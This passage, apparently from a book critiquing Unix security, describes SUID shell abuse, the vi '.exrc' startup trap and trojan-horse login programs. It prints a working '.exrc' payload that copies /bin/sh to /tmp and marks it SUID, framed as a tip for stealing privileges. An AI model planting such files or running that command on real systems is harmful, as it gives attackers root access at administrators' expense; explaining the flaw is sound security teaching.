250 Security


run the newly created /tmp/.sh1 to read, delete, or run any of his files without the formality of learning his password or logging in as him. If he’s got access to a SUID root shell program (usually called doit), so do you. Congratulations! The entire system is at your mercy.

Startup traps
When a complicated Unix program starts up, it reads configuration files from the user’s home directory, from the current directory, or from both, to set initial and default parameters that customize the program to the user’s specifications. Unfortunately, startup files can be created and left by other users to do their bidding on your behalf.

An extremely well-known startup trap preys upon vi, a simple, fast screen-oriented editor that’s preferred by many sysadmins. It’s too bad that vi can’t edit more than one file at a time, which is why sysadmins frequently start up vi from their current directory, rather than in their home directory. Therein lies the rub.

At startup, vi searches for a file called .exrc, the vi startup file, in the current directory. Want to steal a few privs? Put a file called .exrc with the following contents into a directory:
!(cp /bin/sh /tmp/.s$$;chmod 4755 /tmp/.s$$)&

and then wait for an unsuspecting sysadmin to invoke vi from that directory. When she does, she’ll see a flashing exclamation mark at the bottom of her screen for a brief instant, and you’ll have an SUID shell waiting for you in /tmp, just like the previous attack.

Trusted Path and Trojan Horses
Standard Unix provides no trusted path to the operating system. We’ll
explain this concept with an example. Consider the standard Unix login
procedure:
login: jrandom
password: <type your “secret” password>

When you type your password, how do you know that you are typing to the
honest-to-goodness Unix /bin/login program, and not some treacherous
doppelganger? Such doppelgangers, called “trojan horses,” are widely
available on cracker bulletin boards; their sole purpose is to capture your
username and password for later, presumably illegitimate, use.